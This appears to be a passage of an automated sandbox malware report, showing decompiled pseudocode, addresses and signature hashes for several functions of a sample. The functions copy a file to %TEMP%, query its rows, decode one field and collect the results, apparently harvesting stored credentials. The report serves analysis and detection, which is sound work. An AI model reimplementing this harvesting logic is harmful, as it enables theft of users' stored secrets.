                                                                                                                                                                                              0x00411028
                                                                                                                                                                                              0x0041103b
                                                                                                                                                                                              0x0041104c
                                                                                                                                                                                              0x0041105f
                                                                                                                                                                                              0x00411066
                                                                                                                                                                                              0x00411068
                                                                                                                                                                                              0x00411070
                                                                                                                                                                                              0x00411075
                                                                                                                                                                                              0x00411078
                                                                                                                                                                                              0x00411085
                                                                                                                                                                                              0x0041108a
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x004110a8
                                                                                                                                                                                              0x004110ac
                                                                                                                                                                                              0x004110b3
                                                                                                                                                                                              0x004110ba
                                                                                                                                                                                              0x004110c1
                                                                                                                                                                                              0x004110c6
                                                                                                                                                                                              0x004110c9
                                                                                                                                                                                              0x004110de
                                                                                                                                                                                              0x004110ec
                                                                                                                                                                                              0x00410f62
                                                                                                                                                                                              0x00410f64
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x004110f3
                                                                                                                                                                                              0x004110f6
                                                                                                                                                                                              0x004110f9
                                                                                                                                                                                              0x00411106
                                                                                                                                                                                              0x0041110e
                                                                                                                                                                                              0x00411116
                                                                                                                                                                                              0x0041111e
                                                                                                                                                                                              0x0041112b
                                                                                                                                                                                              0x00411133
                                                                                                                                                                                              0x00411140
                                                                                                                                                                                              0x00411148
                                                                                                                                                                                              0x00411155
                                                                                                                                                                                              0x00411162

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                              • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410E60, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00410E60(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t191;
				intOrPtr _t212;
				intOrPtr _t214;
				void* _t220;
				intOrPtr _t226;
				intOrPtr _t230;
				intOrPtr _t231;
				void* _t232;
				void* _t233;

				_t228 = __esi;
				_t190 = __ebx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t230 = _t231;
				_t191 = 0xb;
				do {
					_push(0);
					_push(0);
					_t191 = _t191 - 1;
					_t240 = _t191;
				} while (_t191 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t230);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00403B80( &_v28);
				_push(_t230);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t240);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t240);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t240);
				E004062D8(L"%TEMP%",  &_v64, _t240);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t240);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t191,  &_v36, _t228, _t240);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t191) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t232 = _t231 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t233 = _t232 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L11;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t220);
								E004094C4(_t165,  &_v48, _t220);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t233 = _t233 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L11:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t212);
					 *[fs:eax] = _t212;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t226);
					 *[fs:eax] = _t226;
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                                                                                                                                              0x00410e60
                                                                                                                                                                                              0x00410e60
                                                                                                                                                                                              0x00410e60
                                                                                                                                                                                              0x00410e62
                                                                                                                                                                                              0x00410e64
                                                                                                                                                                                              0x00410e66
                                                                                                                                                                                              0x00410e68
                                                                                                                                                                                              0x00410e6d
                                                                                                                                                                                              0x00410e6f
                                                                                                                                                                                              0x00410e71
                                                                                                                                                                                              0x00410e73
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e7a
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7f
                                                                                                                                                                                              0x00410e80
                                                                                                                                                                                              0x00410e81
                                                                                                                                                                                              0x00410e82
                                                                                                                                                                                              0x00410e85
                                                                                                                                                                                              0x00410e8b
                                                                                                                                                                                              0x00410e92
                                                                                                                                                                                              0x00410e93
                                                                                                                                                                                              0x00410e98
                                                                                                                                                                                              0x00410e9b
                                                                                                                                                                                              0x00410ea1
                                                                                                                                                                                              0x00410ea8
                                                                                                                                                                                              0x00410ea9
                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eb1
                                                                                                                                                                                              0x00410ebc
                                                                                                                                                                                              0x00410ec1
                                                                                                                                                                                              0x00410ec7
                                                                                                                                                                                              0x00410ecc
                                                                                                                                                                                              0x00410ecf
                                                                                                                                                                                              0x00410edc
                                                                                                                                                                                              0x00410ee7
                                                                                                                                                                                              0x00410ef4
                                                                                                                                                                                              0x00410ef9
                                                                                                                                                                                              0x00410efc
                                                                                                                                                                                              0x00410f01
                                                                                                                                                                                              0x00410f0c
                                                                                                                                                                                              0x00410f17
                                                                                                                                                                                              0x00410f21
                                                                                                                                                                                              0x00410f30
                                                                                                                                                                                              0x00410f3b
                                                                                                                                                                                              0x00410f46
                                                                                                                                                                                              0x00410f51
                                                                                                                                                                                              0x00410f60
                                                                                                                                                                                              0x00410f7c
                                                                                                                                                                                              0x00410f83
                                                                                                                                                                                              0x00410f85
                                                                                                                                                                                              0x00410f88
                                                                                                                                                                                              0x00410f8a
                                                                                                                                                                                              0x00410fa2
                                                                                                                                                                                              0x00410fb4
                                                                                                                                                                                              0x00410fbb
                                                                                                                                                                                              0x00410fbd
                                                                                                                                                                                              0x00410fc0
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00411095
                                                                                                                                                                                              0x0041109c
                                                                                                                                                                                              0x0041109f
                                                                                                                                                                                              0x004110a2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410fd3
                                                                                                                                                                                              0x00410fe6
                                                                                                                                                                                              0x00410fed
                                                                                                                                                                                              0x00410ff5
                                                                                                                                                                                              0x00410ff6
                                                                                                                                                                                              0x00411004
                                                                                                                                                                                              0x00411017
                                                                                                                                                                                              0x00411028
                                                                                                                                                                                              0x0041103b
                                                                                                                                                                                              0x0041104c
                                                                                                                                                                                              0x0041105f
                                                                                                                                                                                              0x00411066
                                                                                                                                                                                              0x00411068
                                                                                                                                                                                              0x00411070
                                                                                                                                                                                              0x00411075
                                                                                                                                                                                              0x00411078
                                                                                                                                                                                              0x00411085
                                                                                                                                                                                              0x0041108a
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x004110a8
                                                                                                                                                                                              0x004110ac
                                                                                                                                                                                              0x004110b3
                                                                                                                                                                                              0x004110ba
                                                                                                                                                                                              0x004110c1
                                                                                                                                                                                              0x004110c6
                                                                                                                                                                                              0x004110c9
                                                                                                                                                                                              0x004110de
                                                                                                                                                                                              0x004110ec
                                                                                                                                                                                              0x00410f62
                                                                                                                                                                                              0x00410f64
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x004110f3
                                                                                                                                                                                              0x004110f6
                                                                                                                                                                                              0x004110f9
                                                                                                                                                                                              0x00411106
                                                                                                                                                                                              0x0041110e
                                                                                                                                                                                              0x00411116
                                                                                                                                                                                              0x0041111e
                                                                                                                                                                                              0x0041112b
                                                                                                                                                                                              0x00411133
                                                                                                                                                                                              0x00411140
                                                                                                                                                                                              0x00411148
                                                                                                                                                                                              0x00411155
                                                                                                                                                                                              0x00411162

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                              • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
                                                                                                                                                                                              • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410E68, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410E68(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				WCHAR* _t90;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr* _t109;
				intOrPtr* _t113;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr* _t158;
				intOrPtr* _t162;
				void* _t164;
				intOrPtr* _t169;
				intOrPtr* _t175;
				intOrPtr* _t181;
				void* _t183;
				intOrPtr* _t187;
				void* _t190;
				intOrPtr _t211;
				intOrPtr _t213;
				void* _t219;
				intOrPtr _t225;
				intOrPtr _t229;
				intOrPtr _t230;
				void* _t231;
				void* _t232;

				_t227 = __esi;
				_t189 = __ebx;
				_t70 = __eax | 0x00000a00;
				 *_t70 =  *_t70 + _t70;
				_v117 = _v117 + __edx;
				_t229 = _t230;
				_t190 = 0xb;
				do {
					_push(0);
					_push(0);
					_t190 = _t190 - 1;
					_t238 = _t190;
				} while (_t190 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t70;
				E004040F4( &_v8);
				_push(_t229);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00403B80( &_v28);
				_push(_t229);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t238);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t238);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t189,  &_v40, _t238);
				E004062D8(L"%TEMP%",  &_v64, _t238);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t189,  &_v44, _t238);
				_t90 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t90, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t189, _t190,  &_v36, _t227, _t238);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t189, _t190) != 0) {
					_t105 =  *0x41b55c; // 0x41c784
					_t107 =  *((intOrPtr*)( *_t105))(E00403990(_v36),  &_v16);
					_t231 = _t230 + 8;
					__eflags = _t107;
					if(_t107 == 0) {
						E00408120(0x66,  &_v76);
						_t150 =  *0x41b5cc; // 0x41c78c
						_t152 =  *((intOrPtr*)( *_t150))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t232 = _t231 + 0x14;
						__eflags = _t152;
						if(_t152 == 0) {
							while(1) {
								_t154 =  *0x41b600; // 0x41c790
								_t156 =  *((intOrPtr*)( *_t154))(_v20);
								__eflags = _t156 - 0x64;
								if(_t156 != 0x64) {
									goto L10;
								}
								_t158 =  *0x41b644; // 0x41c798
								_t162 =  *0x41b588; // 0x41c794
								_t164 =  *((intOrPtr*)( *_t162))(_v20, 3,  *((intOrPtr*)( *_t158))(_v20, 3));
								_pop(_t219);
								E004094C4(_t164,  &_v48, _t219);
								E00403D2C( &_v80, _v48);
								_t169 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t169))(_v20, 0, 0x4111a4, _v80, _v28));
								_t175 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t175))(_v20, 1, 0x4111a4, _v84));
								_t181 =  *0x41b588; // 0x41c794
								_t183 =  *((intOrPtr*)( *_t181))(_v20, 2, 0x4111b0, _v88);
								_t232 = _t232 + 0x28;
								E00403C98( &_v92, _t183);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t187 =  *0x41b584; // 0x41b0b4
								 *_t187 =  *_t187 + 1;
								__eflags =  *_t187;
							}
						}
					}
					L10:
					_t109 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t109))(_v20);
					_t113 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t113))(_v16);
					_pop(_t211);
					 *[fs:eax] = _t211;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t225);
					 *[fs:eax] = _t225;
				}
				_pop(_t213);
				 *[fs:eax] = _t213;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}





















































                                                                                                                                                                                              0x00410e68
                                                                                                                                                                                              0x00410e68
                                                                                                                                                                                              0x00410e68
                                                                                                                                                                                              0x00410e6d
                                                                                                                                                                                              0x00410e6f
                                                                                                                                                                                              0x00410e71
                                                                                                                                                                                              0x00410e73
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e7a
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7f
                                                                                                                                                                                              0x00410e80
                                                                                                                                                                                              0x00410e81
                                                                                                                                                                                              0x00410e82
                                                                                                                                                                                              0x00410e85
                                                                                                                                                                                              0x00410e8b
                                                                                                                                                                                              0x00410e92
                                                                                                                                                                                              0x00410e93
                                                                                                                                                                                              0x00410e98
                                                                                                                                                                                              0x00410e9b
                                                                                                                                                                                              0x00410ea1
                                                                                                                                                                                              0x00410ea8
                                                                                                                                                                                              0x00410ea9
                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eb1
                                                                                                                                                                                              0x00410ebc
                                                                                                                                                                                              0x00410ec1
                                                                                                                                                                                              0x00410ec7
                                                                                                                                                                                              0x00410ecc
                                                                                                                                                                                              0x00410ecf
                                                                                                                                                                                              0x00410edc
                                                                                                                                                                                              0x00410ee7
                                                                                                                                                                                              0x00410ef4
                                                                                                                                                                                              0x00410ef9
                                                                                                                                                                                              0x00410efc
                                                                                                                                                                                              0x00410f01
                                                                                                                                                                                              0x00410f0c
                                                                                                                                                                                              0x00410f17
                                                                                                                                                                                              0x00410f21
                                                                                                                                                                                              0x00410f30
                                                                                                                                                                                              0x00410f3b
                                                                                                                                                                                              0x00410f46
                                                                                                                                                                                              0x00410f51
                                                                                                                                                                                              0x00410f60
                                                                                                                                                                                              0x00410f7c
                                                                                                                                                                                              0x00410f83
                                                                                                                                                                                              0x00410f85
                                                                                                                                                                                              0x00410f88
                                                                                                                                                                                              0x00410f8a
                                                                                                                                                                                              0x00410fa2
                                                                                                                                                                                              0x00410fb4
                                                                                                                                                                                              0x00410fbb
                                                                                                                                                                                              0x00410fbd
                                                                                                                                                                                              0x00410fc0
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00411095
                                                                                                                                                                                              0x0041109c
                                                                                                                                                                                              0x0041109f
                                                                                                                                                                                              0x004110a2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410fd3
                                                                                                                                                                                              0x00410fe6
                                                                                                                                                                                              0x00410fed
                                                                                                                                                                                              0x00410ff5
                                                                                                                                                                                              0x00410ff6
                                                                                                                                                                                              0x00411004
                                                                                                                                                                                              0x00411017
                                                                                                                                                                                              0x00411028
                                                                                                                                                                                              0x0041103b
                                                                                                                                                                                              0x0041104c
                                                                                                                                                                                              0x0041105f
                                                                                                                                                                                              0x00411066
                                                                                                                                                                                              0x00411068
                                                                                                                                                                                              0x00411070
                                                                                                                                                                                              0x00411075
                                                                                                                                                                                              0x00411078
                                                                                                                                                                                              0x00411085
                                                                                                                                                                                              0x0041108a
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x0041108f
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x004110a8
                                                                                                                                                                                              0x004110ac
                                                                                                                                                                                              0x004110b3
                                                                                                                                                                                              0x004110ba
                                                                                                                                                                                              0x004110c1
                                                                                                                                                                                              0x004110c6
                                                                                                                                                                                              0x004110c9
                                                                                                                                                                                              0x004110de
                                                                                                                                                                                              0x004110ec
                                                                                                                                                                                              0x00410f62
                                                                                                                                                                                              0x00410f64
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x00410f67
                                                                                                                                                                                              0x004110f3
                                                                                                                                                                                              0x004110f6
                                                                                                                                                                                              0x004110f9
                                                                                                                                                                                              0x00411106
                                                                                                                                                                                              0x0041110e
                                                                                                                                                                                              0x00411116
                                                                                                                                                                                              0x0041111e
                                                                                                                                                                                              0x0041112b
                                                                                                                                                                                              0x00411133
                                                                                                                                                                                              0x00411140
                                                                                                                                                                                              0x00411148
                                                                                                                                                                                              0x00411155
                                                                                                                                                                                              0x00411162

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                              • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410BB0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00410BB0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				signed int _t58;
				WCHAR* _t78;
				intOrPtr* _t93;
				void* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr* _t148;
				void* _t150;
				void* _t156;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t186;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t192;
				void* _t193;

				_t188 = __esi;
				_t155 = __ebx;
				_t57 = __eax +  *__eax;
				 *_t57 =  *_t57 + _t57;
				_t58 = _t57 | 0x5500000a;
				_t190 = _t191;
				_t156 = 9;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
					_t197 = _t156;
				} while (_t156 != 0);
				_push(_t156);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				_push(_t190);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00403B80( &_v28);
				_push(_t190);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t197);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t197);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t155,  &_v40, _t197);
				E004062D8(L"%TEMP%",  &_v60, _t197);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t155,  &_v44, _t197);
				_t78 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t78, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t155, _t156,  &_v36, _t188, _t197);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t155, _t156) != 0) {
					_t93 =  *0x41b55c; // 0x41c784
					_t95 =  *((intOrPtr*)( *_t93))(E00403990(_v36),  &_v16);
					_t192 = _t191 + 8;
					__eflags = _t95;
					if(_t95 == 0) {
						E00408120(0x65,  &_v72);
						_t134 =  *0x41b5cc; // 0x41c78c
						_t136 =  *((intOrPtr*)( *_t134))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t193 = _t192 + 0x14;
						__eflags = _t136;
						if(_t136 == 0) {
							while(1) {
								_t138 =  *0x41b600; // 0x41c790
								_t140 =  *((intOrPtr*)( *_t138))(_v20);
								__eflags = _t140 - 0x64;
								if(_t140 != 0x64) {
									goto L11;
								}
								_t142 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t142))(_v20, 0, _v28));
								_t148 =  *0x41b588; // 0x41c794
								_t150 =  *((intOrPtr*)( *_t148))(_v20, 1, E00410E60, _v76);
								_t193 = _t193 + 0x10;
								E00403C98( &_v80, _t150);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L11:
					_t97 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t97))(_v20);
					_t101 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t101))(_v16);
					_pop(_t176);
					 *[fs:eax] = _t176;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t186);
					 *[fs:eax] = _t186;
				}
				_pop(_t178);
				 *[fs:eax] = _t178;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}












































                                                                                                                                                                                              0x00410bb0
                                                                                                                                                                                              0x00410bb0
                                                                                                                                                                                              0x00410bb0
                                                                                                                                                                                              0x00410bb2
                                                                                                                                                                                              0x00410bb4
                                                                                                                                                                                              0x00410bb9
                                                                                                                                                                                              0x00410bbb
                                                                                                                                                                                              0x00410bc0
                                                                                                                                                                                              0x00410bc0
                                                                                                                                                                                              0x00410bc2
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc4
                                                                                                                                                                                              0x00410bc7
                                                                                                                                                                                              0x00410bc8
                                                                                                                                                                                              0x00410bc9
                                                                                                                                                                                              0x00410bca
